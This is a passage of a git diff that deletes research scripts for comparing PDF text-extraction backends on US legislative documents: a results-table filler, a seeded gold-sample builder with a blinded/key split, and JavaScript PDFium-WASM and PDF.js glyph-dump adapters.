cell(p, INCUMBENT, "T2_amount_entries", "f1") is not None] - declined = [p for p in pairs if p not in scored] - - rows = [ - f"Scored on **{len(scored)} of {data['n_pairs']}** pairs. " - f"{len(declined)} declined by the production unnumbered-layout guard" - + (f" ({', '.join(declined)})" if declined else "") - + ".", - "", - "| Backend | amounts identical | changes identical | amount F1 | change F1 |", - "|---|---|---|---|---|", - ] - for b in backends: - if b == INCUMBENT: - rows.append(f"| {LABEL[b]} | (reference) | (reference) | — | — |") - continue - ai = [x for x in (cell(p, b, "T4_vs_incumbent", "identical_amounts") for p in scored) if x is not None] - ci = [x for x in (cell(p, b, "T4_vs_incumbent", "identical_changes") for p in scored) if x is not None] - af = [x for x in (cell(p, b, "T4_vs_incumbent", "amount_entries", "f1") for p in scored) if x is not None] - cf = [x for x in (cell(p, b, "T4_vs_incumbent", "change_signatures", "f1") for p in scored) if x is not None] - mark = "**" if ai and sum(ai) == len(ai) else "" - rows.append( - f"| {LABEL[b]} | {mark}{sum(ai)}/{len(ai)}{mark} | {sum(ci)}/{len(ci)} | {mean(af):.4f} | {mean(cf):.4f} |" - ) - return "\n".join(rows) - - -def t2_table(data: dict) -> str: - import sys - - sys.path.insert(0, str(HERE)) - from report_phase2 import quoted_block_pairs - - qb = quoted_block_pairs() - pairs = data["pairs"] - backends = data["backends"] - mode = "repaired" - - def cell(p, b, *keys): - e = pairs[p].get(f"{b}/{mode}") - if not e or "error" in e: - return None - for k in keys: - e = e.get(k) if isinstance(e, dict) else None - if e is None: - return None - return e - - def stratum(p): - n_ref = cell(p, INCUMBENT, "T2_amount_entries", "n_reference") - n_cand = cell(p, INCUMBENT, "T2_amount_entries", "n_candidate") - if n_ref is None: - return None - if not n_ref and not n_cand: - return "empty_both" - if not n_ref: - return "xml_found_none" - return "substantive_qb" if p in qb else "substantive_clean" - - notes = { - "substantive_clean": "real amounts, XML reference **sound** — the informative population", - "substantive_qb": "real amounts, XML reference carries `` (known parser drop)", - "xml_found_none": "XML found no amounts; F1 is an empty-denominator artifact", - "empty_both": "neither side found amounts; F1 trivially 1.0, no information", - } - out = [] - for label in ("substantive_clean", "substantive_qb", "xml_found_none", "empty_both"): - ps = [p for p in pairs if stratum(p) == label] - if not ps: - continue - out.append(f"**`{label}`** (n={len(ps)}) — {notes[label]}") - out.append("") - out.append("| Backend | mean F1 | min F1 | perfect |") - out.append("|---|---|---|---|") - for b in backends: - f1 = [x for x in (cell(p, b, "T2_amount_entries", "f1") for p in ps) if x is not None] - if not f1: - continue - out.append(f"| {LABEL[b]} | {mean(f1):.4f} | {min(f1):.4f} | {sum(1 for x in f1 if x == 1.0)}/{len(f1)} |") - out.append("") - return "\n".join(out).rstrip() - - -def tierb_block(data: dict) -> str: - docs = data["documents"] - backends = [b for b in next(iter(docs.values())) if b != INCUMBENT] - out = [ - f"Measured on **{len(docs)}** non-corpus documents with no XML reference: the " - "watermarked committee report `CRPT-118srpt198`, the watermarked Senate bill " - "`BILLS-118s4795rs`, and nine House-reported subcommittee prints. The spec asks " - "for the first two by name; the nine are additional **Tier A** print-class " - "variety, as the spec itself classifies them.", - "", - "| Backend | opened | text identical to incumbent | line numbers identical | mean breadcrumb agreement |", - "|---|---|---|---|---|", - ] - n = len(docs) - for b in backends: - ok = [v[b] for v in docs.values() if b in v and "error" not in v[b]] - ti = sum(1 for r in ok if r["vs_incumbent"] and r["vs_incumbent"]["text_identical"]) - li = sum(1 for r in ok if r["vs_incumbent"] and r["vs_incumbent"]["line_numbers_identical"]) - bc = [ - r["vs_incumbent"]["breadcrumb_agreement"] - for r in ok - if r["vs_incumbent"] and r["vs_incumbent"]["breadcrumb_agreement"] is not None - ] - out.append(f"| {LABEL.get(b, b)} | {len(ok)}/{n} | {ti}/{len(ok)} | {li}/{len(ok)} | {mean(bc):.4f} |") - return "\n".join(out) - - -def splice(text: str, marker: str, block: str) -> str: - start = f"" - end = f"" - if start not in text: - return text - head, rest = text.split(start, 1) - tail = rest.split(end, 1)[1] if end in rest else rest - return f"{head}{start}\n\n{block}\n\n{end}{tail}" - - -def main() -> None: - doc = DOC.read_text() - p2 = RESULTS / "phase2.json" - if p2.exists(): - data = json.loads(p2.read_text()) - doc = splice(doc, "T4_TABLE", t4_table(data)) - doc = splice(doc, "T2_TABLE", t2_table(data)) - tb = RESULTS / "tierb.json" - if tb.exists(): - doc = splice(doc, "TIERB", tierb_block(json.loads(tb.read_text()))) - DOC.write_text(doc) - print(f"filled {DOC}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/gold_build.py b/docs/research/pdf-backend-bakeoff/probes/gold_build.py deleted file mode 100644 index 0b4500e4..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/gold_build.py +++ /dev/null @@ -1,417 +0,0 @@ -"""Build the image-adjudicated gold sample: frame, strata, seeded draw, blind/key split. - -PRE-REGISTRATION-CONFIRMATORY.md, "The gold sample". - -Naming, honestly: the protocol asked for a HUMAN-adjudicated sample and no human is at the -keyboard. What this builds is an IMAGE-adjudicated sample. The adjudicator reads page -images rendered by Apple's QuickLook/CoreGraphics -- an implementation independent of -PDFium, pdfminer, PyMuPDF and PDF.js -- and pypdf is used only to split one page out of a -document, which is structural manipulation, not text extraction. - -BLINDING. The frame is built from backend output, so this script knows every candidate's -answer. The adjudicator must not, and the split is what enforces it: - - gold_key.json document, page, WHICH backends contributed and WHAT each said, the - XML value, and the stratum. Written, committed, then not opened - until scoring. - gold_blind.json document, page, rendered image path, a bounding-box locator, and the - question. Nothing else. This is all the adjudicator sees. - -A bounding box says WHERE to look without saying WHAT is there. Items are emitted in a -seeded cross-stratum shuffle so neighbouring items do not reveal which cell -- and -therefore which expected difficulty -- an item came from. - -Ordering is enforced by COMMIT ORDER, not by intent: gold_adjudicated.json is committed -before gold_key.json is joined to it. See the reviewer kit in the preregistration. - -Run: .venv/bin/python docs/research/pdf-backend-bakeoff/probes/gold_build.py -""" - -from __future__ import annotations - -import argparse -import json -import random -import re -import subprocess -import sys -from collections import defaultdict -from pathlib import Path - -PROBES = Path(__file__).resolve().parent -REPO = PROBES.parents[3] -for p in (str(PROBES), str(REPO / "src"), str(REPO)): - if p not in sys.path: - sys.path.insert(0, p) - -import confirm_metrics as M # noqa: E402 -from contract import ALL_BACKENDS, UPRIGHT, run_backend # noqa: E402 -from reconstruct import reconstruct # noqa: E402 -from score_phase1 import corpus_documents # noqa: E402 - -from deltatrack.compare.pdf import _is_unnumbered_layout # noqa: E402 -from deltatrack.parsers.pdf_anchors import extract_anchors # noqa: E402 - -SEED = 20260805 -_AMOUNT = re.compile(r"\$[\d,]+(?:\.\d+)?") - -FINANCIAL_STRATA = { - "disagree": 10, - "long_block": 8, - "heading_transition": 8, - "page_boundary": 8, - "soft_hyphen": 6, - "watermark": 6, - "table_like": 4, -} -STRUCTURAL_STRATA = { - "disagree": 10, - "small_caps": 12, - "agency": 8, - "page_boundary": 8, - "watermark": 6, - "grouping_or_title": 6, -} - - -def watermarked(raw_pages) -> set[int]: - """Pages carrying the rotated left-gutter watermark, by non-upright glyphs.""" - return {p.page_number for p in raw_pages if any(not g[UPRIGHT] for g in p.glyphs)} - - -def collect(doc_key: str, pdf: Path) -> dict: - """Per-backend view of one document: amount lines and heading anchors.""" - per_backend: dict[str, dict] = {} - wm: set[int] = set() - for backend in ALL_BACKENDS: - try: - raw, _ = run_backend(backend, pdf) - except Exception as exc: # noqa: BLE001 - per_backend[backend] = {"error": str(exc)} - continue - wm |= watermarked(raw) - pages, _ = reconstruct(raw, repaired=True) - if _is_unnumbered_layout(pages): - per_backend[backend] = {"declined": True} - continue - amounts, lines = {}, {} - for page in pages: - for ln in page.print_lines: - if ln.line_number is None: - continue - key = (page.page_number, ln.line_number) - lines[key] = ln.text - found = _AMOUNT.findall(ln.text or "") - if found: - amounts[key] = found - anchors = { - (a.page_number, a.line_number): {"kind": a.kind, "text": a.text} - for a in extract_anchors(pages) - if a.kind in M.PDF_HEADING_KINDS and a.line_number is not None - } - per_backend[backend] = {"amounts": amounts, "lines": lines, "anchors": anchors} - return {"doc": doc_key, "backends": per_backend, "watermarked_pages": sorted(wm)} - - -def assign_financial(view: dict) -> dict[tuple, dict]: - """One candidate item per (page, line) any backend saw an amount on.""" - good = {b: v for b, v in view["backends"].items() if "amounts" in v} - if not good: - return {} - wm = set(view["watermarked_pages"]) - items: dict[tuple, dict] = {} - all_keys = set().union(*[set(v["amounts"]) for v in good.values()]) - - ref = good.get("pdfium-native") or next(iter(good.values())) - anchor_lines = sorted(set().union(*[set(v["anchors"]) for v in good.values()])) - max_line = {} - for v in good.values(): - for pg, ln in v["lines"]: - max_line[pg] = max(max_line.get(pg, 0), ln) - - # Distance-since-last-heading must be counted in DOCUMENT order, not within a page. - # Computed per page it can never exceed a page's ~25 printed lines, so the >40 test for - # "deep inside a long appropriations block" was structurally incapable of firing and the - # stratum drew a frame of 0 twice before this was noticed. A global ordinal over every - # printed line lets the distance cross page boundaries, which is where long blocks live. - all_lines = sorted(set().union(*[set(v["lines"]) for v in good.values()])) - seq = {k: i for i, k in enumerate(all_lines)} - anchor_seq = sorted(seq[k] for k in anchor_lines if k in seq) - - for key in sorted(all_keys): - page, line = key - texts = {b: v["lines"].get(key) for b, v in good.items()} - amts = {b: tuple(v["amounts"].get(key, ())) for b, v in good.items()} - contributors = [b for b, v in good.items() if key in v["amounts"]] - disagree = len(set(amts.values())) > 1 or len({t for t in texts.values() if t}) > 1 - - import bisect - - here = seq.get(key) - j = bisect.bisect_right(anchor_seq, here) - 1 if here is not None else -1 - dist = (here - anchor_seq[j]) if (here is not None and j >= 0) else None - txt = ref["lines"].get(key) or next((t for t in texts.values() if t), "") or "" - - # Assignment is first-match, so the ORDER decides which strata can fill. An earlier - # version ran common-first (watermark, soft_hyphen before table_like, long_block) and - # starved the rare cells outright: long_block drew a frame of 0 and table_like of 1 - # against targets of 8 and 4, because nearly every GPO page carries the rotated - # watermark and most lines end in a hyphen. Rare and structurally interesting cells - # are tested first; the broad ones mop up. - if disagree: - stratum = "disagree" - elif dist is not None and dist > 40: - stratum = "long_block" - elif len(_AMOUNT.findall(txt)) >= 3: - stratum = "table_like" - elif dist is not None and dist <= 3: - stratum = "heading_transition" - elif line <= 2 or (page in max_line and line >= max_line[page] - 1): - stratum = "page_boundary" - elif txt.rstrip().endswith("-"): - stratum = "soft_hyphen" - elif page in wm: - stratum = "watermark" - else: - continue - items[key] = { - "kind": "financial", - "stratum": stratum, - "page": page, - "line": line, - "contributors": sorted(contributors), - "backend_text": texts, - "backend_amounts": {b: list(a) for b, a in amts.items()}, - } - return items - - -def assign_structural(view: dict) -> dict[tuple, dict]: - good = {b: v for b, v in view["backends"].items() if "anchors" in v} - if not good: - return {} - wm = set(view["watermarked_pages"]) - items: dict[tuple, dict] = {} - all_keys = set().union(*[set(v["anchors"]) for v in good.values()]) - max_line: dict[int, int] = {} - for v in good.values(): - for pg, ln in v["lines"]: - max_line[pg] = max(max_line.get(pg, 0), ln) - - for key in sorted(all_keys): - page, line = key - seen = {b: v["anchors"].get(key) for b, v in good.items()} - kinds = {(s or {}).get("kind") for s in seen.values()} - texts = {(s or {}).get("text") for s in seen.values()} - contributors = [b for b, s in seen.items() if s] - disagree = len(contributors) != len(good) or len(kinds) > 1 or len(texts) > 1 - kind = next((k for k in kinds if k), None) - line_text = next((v["lines"].get(key) for v in good.values() if v["lines"].get(key)), "") or "" - # GPO sets account headings in faux small caps, and the reconstructed text of one - # is all-uppercase. The size signature that actually distinguishes them lives in - # the glyphs, which this frame does not carry, so uppercase is the proxy and is - # named as such rather than dressed up. - smallcaps = bool(line_text) and line_text.strip().isupper() - - if disagree: - stratum = "disagree" - elif kind == "agency": - stratum = "agency" - elif kind == "grouping": - stratum = "grouping_or_title" - elif line <= 2 or (page in max_line and line >= max_line[page] - 1): - stratum = "page_boundary" - elif page in wm: - stratum = "watermark" - elif kind == "account" and smallcaps: - stratum = "small_caps" - else: - continue - items[key] = { - "kind": "structural", - "stratum": stratum, - "page": page, - "line": line, - "contributors": sorted(contributors), - "backend_anchor": {b: s for b, s in seen.items()}, - "line_text": line_text, - } - return items - - -def render_page(pdf: Path, page_number: int, dest: Path) -> bool: - """One page, split by pypdf then rasterized by QuickLook/CoreGraphics. - - Neither step is a text extractor, and CoreGraphics shares no code with any candidate. - sips renders the page with a transparent background that flattens to solid black in - PNG, which is unreadable; qlmanage composites onto white. - """ - from pypdf import PdfReader, PdfWriter - - dest.parent.mkdir(parents=True, exist_ok=True) - one = dest.with_suffix(".page.pdf") - reader = PdfReader(str(pdf)) - if page_number > len(reader.pages): - return False - writer = PdfWriter() - writer.add_page(reader.pages[page_number - 1]) - with open(one, "wb") as fh: - writer.write(fh) - subprocess.run( - ["qlmanage", "-t", "-s", "2000", "-o", str(dest.parent), str(one)], - capture_output=True, - timeout=120, - ) - produced = dest.parent / (one.name + ".png") - if produced.exists(): - produced.rename(dest) - one.unlink(missing_ok=True) - return True - one.unlink(missing_ok=True) - return False - - -def main() -> None: - ap = argparse.ArgumentParser() - ap.add_argument("--out-dir", type=Path, default=REPO / "docs/research/pdf-backend-bakeoff/results") - ap.add_argument("--render-dir", type=Path, default=None) - ap.add_argument("--limit-docs", type=int, default=None) - ap.add_argument( - "--render-only", - action="store_true", - help="re-render page images from an existing gold_blind.json and exit. The frozen " - "sample is the JSON; the PNGs are ~29 MB of deterministic output and are gitignored, " - "so this recreates them without rebuilding (or perturbing) the sample.", - ) - args = ap.parse_args() - - render_dir = args.render_dir or (REPO / "docs/research/pdf-backend-bakeoff/results/gold_pages") - - if args.render_only: - blind = json.loads((args.out_dir / "gold_blind.json").read_text()) - key = json.loads((args.out_dir / "gold_key.json").read_text()) - pdf_by_doc = {i["doc"]: REPO / i["pdf"] for i in key["items"]} - n = 0 - for item in blind["items"]: - img = render_dir / f"{item['document'].replace('/', '_')}_p{item['page']}.png" - if img.exists(): - continue - src = pdf_by_doc.get(item["document"]) - if src and render_page(src, item["page"], img): - n += 1 - print(f"re-rendered {n} page images into {render_dir}") - return - docs = corpus_documents() - if args.limit_docs: - docs = docs[: args.limit_docs] - - frame: list[dict] = [] - unlocatable_xml_headings = 0 - for i, (bill, version, pdf, xml) in enumerate(docs, 1): - key = f"{bill}/{version}" - view = collect(key, pdf) - fin = assign_financial(view) - st = assign_structural(view) - if not fin and not st: - print(f" [{i}/{len(docs)}] {key:<28} skipped (declined or empty)", file=sys.stderr) - continue - try: - ref = M.xml_reference(xml) - found = set() - for v in view["backends"].values(): - for a in (v.get("anchors") or {}).values(): - found.add(M.norm_label(a["text"])) - unlocatable_xml_headings += len(ref["labels"] - found) - except Exception: # noqa: BLE001 - pass - for item in list(fin.values()) + list(st.values()): - frame.append({"doc": key, "pdf": str(pdf.relative_to(REPO)), **item}) - print(f" [{i}/{len(docs)}] {key:<28} financial={len(fin)} structural={len(st)}", file=sys.stderr) - - by_stratum: dict[tuple[str, str], list[dict]] = defaultdict(list) - for item in frame: - by_stratum[(item["kind"], item["stratum"])].append(item) - - rng = random.Random(SEED) - sample: list[dict] = [] - frame_report = {} - for kind, strata in (("financial", FINANCIAL_STRATA), ("structural", STRUCTURAL_STRATA)): - for stratum, n in strata.items(): - pool = sorted(by_stratum.get((kind, stratum), []), key=lambda d: (d["doc"], d["page"], d["line"])) - idx = list(range(len(pool))) - rng.shuffle(idx) - taken = [pool[j] for j in idx[:n]] - for rank, item in enumerate(taken): - item["_frame_size"] = len(pool) - item["_selection_index"] = rank - sample.append(item) - frame_report[f"{kind}/{stratum}"] = {"frame": len(pool), "target": n, "taken": len(taken)} - print(f" {kind}/{stratum:20} frame={len(pool):5} target={n} taken={len(taken)}", file=sys.stderr) - - rng.shuffle(sample) - for n, item in enumerate(sample, 1): - item["item_id"] = f"G{n:03d}" - - args.out_dir.mkdir(parents=True, exist_ok=True) - key_path = args.out_dir / "gold_key.json" - blind_path = args.out_dir / "gold_blind.json" - - key_path.write_text( - json.dumps( - { - "seed": SEED, - "frame_report": frame_report, - "unlocatable_xml_headings": unlocatable_xml_headings, - "note": "NOT READ BY THE ADJUDICATOR until gold_adjudicated.json is committed.", - "items": sample, - }, - indent=1, - default=str, - ) - ) - - blind_items = [] - rendered = 0 - for item in sample: - pdf = REPO / item["pdf"] - img = render_dir / f"{item['doc'].replace('/', '_')}_p{item['page']}.png" - if not img.exists(): - if render_page(pdf, item["page"], img): - rendered += 1 - q = ( - "Record the printed line number, the exact text of that printed line, the " - "amount(s) as printed, and the enclosing account/agency heading as printed." - if item["kind"] == "financial" - else "Record the printed line number, the exact text of that printed line, " - "whether it is a heading, and the heading immediately above it in the printed page." - ) - blind_items.append( - { - "item_id": item["item_id"], - "document": item["doc"], - "page": item["page"], - "image": str(img.relative_to(REPO)) if img.exists() else None, - "locator_printed_line": item["line"], - "question": q, - } - ) - blind_path.write_text( - json.dumps( - { - "seed": SEED, - "renderer": "pypdf page split + qlmanage (QuickLook/CoreGraphics)", - "note": "No backend name, no candidate text, no XML value, no stratum label.", - "items": blind_items, - }, - indent=1, - ) - ) - - pages = {(b["document"], b["page"]) for b in blind_items} - print(f"\nsample: {len(sample)} items across {len(pages)} distinct pages ({rendered} newly rendered)") - print(f"wrote {key_path}") - print(f"wrote {blind_path}") - - -if __name__ == "__main__": - main() diff --git a/docs/research/pdf-backend-bakeoff/probes/js/.gitignore b/docs/research/pdf-backend-bakeoff/probes/js/.gitignore deleted file mode 100644 index 504afef8..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/.gitignore +++ /dev/null @@ -1,2 +0,0 @@ -node_modules/ -package-lock.json diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs deleted file mode 100644 index 72473439..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_hybrid_wasm.mjs +++ /dev/null @@ -1,144 +0,0 @@ -// Backend adapter: PDFium-WASM emitting the HYBRID contract (contract_hybrid.py). -// -// The portability half of the experiment. `backends/pdfium_hybrid.py` shows the indexed -// text-plus-geometry contract is available from native PDFium; this shows the same -// contract is available from the browser-shippable WASM build with no custom wrapper -// work -- every entry point it needs is already exported by @embedpdf/pdfium. -// -// Emits JSONL, one object per page: -// {"page_number":1,"width":612,"height":792, -// "chars":[[cp,generated,baseline,x0,x1,size,vbox,font,upright],...]} -// then a final {"summary":{...}} line. Field order matches contract_hybrid.CHAR_FIELDS. -// -// Run: node dump_pdfium_hybrid_wasm.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const pdfium = await init({ wasmBinary: readFileSync(require.resolve("@embedpdf/pdfium/pdfium.wasm")) }); -pdfium.PDFiumExt_Init?.(); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -if (!doc) { - console.error("FPDF_LoadMemDocument failed"); - process.exit(2); -} - -const nPages = pdfium.FPDF_GetPageCount(doc); -const total = limit ? Math.min(limit, nPages) : nPages; - -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const orgPtr = pdfium.pdfium.wasmExports.malloc(16); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -const SOFT_HYPHEN = 0x00ad; -const t0 = performance.now(); -let charTotal = 0; -let generatedTotal = 0; -let hyphenTotal = 0; -let mapErrorTotal = 0; -let emptyFonts = 0; -let unnamed = 0; - -for (let p = 0; p < total; p++) { - const page = pdfium.FPDF_LoadPage(doc, p); - const tp = pdfium.FPDFText_LoadPage(page); - const width = pdfium.FPDF_GetPageWidthF(page); - const height = pdfium.FPDF_GetPageHeightF(page); - const n = pdfium.FPDFText_CountChars(tp); - const fontCache = new Map(); - const chars = []; - - for (let i = 0; i < Math.max(n, 0); i++) { - let cp = pdfium.FPDFText_GetUnicode(tp, i); - const generated = pdfium.FPDFText_IsGenerated(tp, i) === 1; - const hyphen = pdfium.FPDFText_IsHyphen(tp, i) === 1; - if (pdfium.FPDFText_HasUnicodeMapError(tp, i) === 1) mapErrorTotal++; - if (hyphen) { - cp = SOFT_HYPHEN; - hyphenTotal++; - } else if (cp < 0x20 && !generated) { - cp = 0xfffd; - unnamed++; - } - - const okOrigin = pdfium.FPDFText_GetCharOrigin(tp, i, orgPtr, orgPtr + 8); - const originY = okOrigin ? pdfium.pdfium.getValue(orgPtr + 8, "double") : null; - const originX = okOrigin ? pdfium.pdfium.getValue(orgPtr, "double") : null; - - if (generated) { - // Same rule as the native adapter: a generated char keeps only its origin. Its - // box, matrix, size and font name are placeholders and are emitted as null so - // nothing downstream can consume them by accident. - generatedTotal++; - chars.push([cp, true, originY, originX, null, null, null, "", true]); - continue; - } - - const okBox = pdfium.FPDFText_GetCharBox(tp, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24); - const okMat = pdfium.FPDFText_GetMatrix(tp, i, matPtr); - if (!okBox || !okMat || !okOrigin) continue; - const left = pdfium.pdfium.getValue(boxPtr, "double"); - const right = pdfium.pdfium.getValue(boxPtr + 8, "double"); - const bottom = pdfium.pdfium.getValue(boxPtr + 16, "double"); - const top = pdfium.pdfium.getValue(boxPtr + 24, "double"); - const a = pdfium.pdfium.getValue(matPtr, "float"); - const b = pdfium.pdfium.getValue(matPtr + 4, "float"); - const size = pdfium.FPDFText_GetFontSize(tp, i) * Math.hypot(a, b); - - const len = pdfium.FPDFText_GetFontInfo(tp, i, namePtr, 256, flagsPtr); - let font = ""; - if (len > 0) { - const key = `${namePtr}:${len}`; - font = fontCache.get(key) ?? pdfium.pdfium.UTF8ToString(namePtr); - fontCache.set(key, font); - } else { - emptyFonts++; - } - - chars.push([cp, false, originY, left, right, r4(size), [bottom, top], font, Math.abs(b) < 1e-6 && a > 0]); - } - charTotal += chars.length; - - process.stdout.write( - JSON.stringify({ page_number: p + 1, width: r4(width), height: r4(height), chars }) + "\n", - ); - pdfium.FPDFText_ClosePage(tp); - pdfium.FPDF_ClosePage(page); -} - -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfium-hybrid-wasm", - pages: total, - pages_total: nPages, - chars: charTotal, - generated_chars: generatedTotal, - hyphen_chars: hyphenTotal, - unicode_map_errors: mapErrorTotal, - unnamed_ink: unnamed, - empty_font_names: emptyFonts, - extract_ms: Math.round(performance.now() - t0), - }, - }) + "\n", -); - -pdfium.FPDF_CloseDocument(doc); - -function r4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs deleted file mode 100644 index fff0476d..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfium_wasm.mjs +++ /dev/null @@ -1,155 +0,0 @@ -// Backend adapter: PDFium-WASM (@embedpdf/pdfium, MIT wrapper around BSD-3 PDFium). -// -// Emits the neutral PdfPage contract as JSONL on stdout, one JSON object per page: -// {"page_number":1,"width":612.0,"height":792.0,"glyphs":[[cp,x0,y0,x1,y1,baseline,size,font],...]} -// followed by a final {"summary":{...}} line. -// -// Phase 0 gate 1 for this backend is simply that it runs: the four FFI entry points the -// glyph sidecar needs (FPDFText_CountChars / GetCharBox / GetMatrix / GetFontSize) are -// exported by the shipped .wasm, and this probe calls them for real rather than reading -// the symbol table. -// -// Run: node dump_pdfium_wasm.mjs [--limit N] - -import { readFileSync } from "node:fs"; -import { createRequire } from "node:module"; - -const require = createRequire(import.meta.url); -const { init } = require("@embedpdf/pdfium"); - -const args = process.argv.slice(2); -const pdfPath = args[0]; -const limitIdx = args.indexOf("--limit"); -const limit = limitIdx >= 0 ? parseInt(args[limitIdx + 1], 10) : null; - -const wasmPath = require.resolve("@embedpdf/pdfium/pdfium.wasm"); -const wasmBinary = readFileSync(wasmPath); -const pdfium = await init({ wasmBinary }); - -pdfium.PDFiumExt_Init?.(); - -const data = new Uint8Array(readFileSync(pdfPath)); -const dataPtr = pdfium.pdfium.wasmExports.malloc(data.length); -pdfium.pdfium.HEAPU8.set(data, dataPtr); -const doc = pdfium.FPDF_LoadMemDocument(dataPtr, data.length, ""); -if (!doc) { - console.error("FPDF_LoadMemDocument failed"); - process.exit(2); -} - -const nPages = pdfium.FPDF_GetPageCount(doc); -const total = limit ? Math.min(limit, nPages) : nPages; - -// Scratch buffers reused across every glyph: 4 doubles for the char box, 6 floats for -// the matrix, a font-name buffer and an int for the font flags. -const boxPtr = pdfium.pdfium.wasmExports.malloc(32); -const matPtr = pdfium.pdfium.wasmExports.malloc(24); -const namePtr = pdfium.pdfium.wasmExports.malloc(256); -const flagsPtr = pdfium.pdfium.wasmExports.malloc(4); - -const t0 = performance.now(); -let glyphTotal = 0; -let emptyFontNames = 0; -let undecodable = 0; -// Minimum box width (points) for a glyph to count as ink rather than a structural -// marker. PDFium's 0x0A/0x0D breaks measure exactly 0.0 wide; the narrowest real GPO -// glyph on this corpus (the soft hyphen) measures ~3.0. -const INK_WIDTH = 0.5; - -for (let p = 0; p < total; p++) { - const page = pdfium.FPDF_LoadPage(doc, p); - const textPage = pdfium.FPDFText_LoadPage(page); - const width = pdfium.FPDF_GetPageWidthF(page); - const height = pdfium.FPDF_GetPageHeightF(page); - const n = pdfium.FPDFText_CountChars(textPage); - - const glyphs = []; - // Font names repeat heavily within a page; cache by the (name, flags) the FFI returns - // so a 3000-glyph page makes a handful of string decodes rather than 3000. - const fontCache = new Map(); - - for (let i = 0; i < Math.max(n, 0); i++) { - let cp = pdfium.FPDFText_GetUnicode(textPage, i); - - if (!pdfium.FPDFText_GetCharBox(textPage, i, boxPtr, boxPtr + 8, boxPtr + 16, boxPtr + 24)) { - continue; - } - const left = pdfium.pdfium.getValue(boxPtr, "double"); - const right = pdfium.pdfium.getValue(boxPtr + 8, "double"); - const bottom = pdfium.pdfium.getValue(boxPtr + 16, "double"); - const top = pdfium.pdfium.getValue(boxPtr + 24, "double"); - - // Backend-neutral undecodable-glyph rule (see backends/pdfium_native.py): a control - // codepoint with a zero-width box is a structural marker and is dropped; one with - // real ink is a glyph this backend could not name, carried as U+FFFD so the loss is - // visible to the scorer. Keyed on ink, never on a codepoint value. - if (cp < 0x20) { - if (right - left < INK_WIDTH) continue; - cp = 0xfffd; - undecodable++; - } - - if (!pdfium.FPDFText_GetMatrix(textPage, i, matPtr)) continue; - const a = pdfium.pdfium.getValue(matPtr, "float"); - const b = pdfium.pdfium.getValue(matPtr + 4, "float"); - // matrix[5] (f) is the text-object origin y, i.e. the TRUE baseline, shared by every - // glyph on a printed line. The char-box bottom is not -- descenders sit below it and - // would split one line into two clusters. See the note in backends/pdfium_native.py. - const baseline = pdfium.pdfium.getValue(matPtr + 20, "float"); - // GPO defines fonts at size 1 and scales via the text matrix, so the true glyph - // size is GetFontSize x sqrt(a^2 + b^2) -- the same rule the native sidecar uses. - const fs = pdfium.FPDFText_GetFontSize(textPage, i); - const size = fs * Math.sqrt(a * a + b * b); - - // Font identity: FPDFText_GetFontInfo writes the PostScript name into a buffer and - // returns its byte length. A zero length is the "empty font name" case the source - // inventory warns about, counted here per backend. - const len = pdfium.FPDFText_GetFontInfo(textPage, i, namePtr, 256, flagsPtr); - let font = ""; - if (len > 0) { - const key = `${namePtr}:${len}`; - font = fontCache.get(key) ?? pdfium.pdfium.UTF8ToString(namePtr); - fontCache.set(key, font); - } else { - emptyFontNames++; - } - - // upright: the text matrix carries no rotation/skew component. - const upright = Math.abs(b) < 1e-6 && a > 0; - glyphs.push([cp, left, bottom, right, top, round4(baseline), round4(size), font, upright]); - } - glyphTotal += glyphs.length; - - process.stdout.write( - JSON.stringify({ - page_number: p + 1, - width: round4(width), - height: round4(height), - glyphs, - }) + "\n", - ); - - pdfium.FPDFText_ClosePage(textPage); - pdfium.FPDF_ClosePage(page); -} - -const elapsed = performance.now() - t0; -process.stdout.write( - JSON.stringify({ - summary: { - backend: "pdfium-wasm", - pages: total, - pages_total: nPages, - glyphs: glyphTotal, - empty_font_names: emptyFontNames, - undecodable_glyphs: undecodable, - extract_ms: Math.round(elapsed), - }, - }) + "\n", -); - -pdfium.FPDF_CloseDocument(doc); - -function round4(x) { - return Math.round(x * 10000) / 10000; -} diff --git a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs b/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs deleted file mode 100644 index e8640a3f..00000000 --- a/docs/research/pdf-backend-bakeoff/probes/js/dump_pdfjs.mjs +++ /dev/null @@ -1,154 +0,0 @@ -// Backend adapter: PDF.js (Apache-2.0), emitting the neutral PdfPage contract as JSONL. -// -// PDF.js is the one candidate that cannot satisfy the contract directly. It exposes -// geometry at TEXT-ITEM granularity (~12-13 chars per item: str, dir, width, height, -// transform, fontName, hasEOL) with no per-character box, and disableCombineTextItems -// no longer changes that in pdfjs-dist 6.x. So this adapter SYNTHESIZES per-character -// boxes by distributing the item's measured width across its characters. -// -// Which of "synthesize boxes in the adapter" vs "make the pure layer tolerant of -// item-level input" gets chosen is itself a finding the spec asks for. Synthesis is -// chosen here because it keeps ONE neutral reconstruction layer for every backend; a -// tolerant pure layer would be a second code path that only 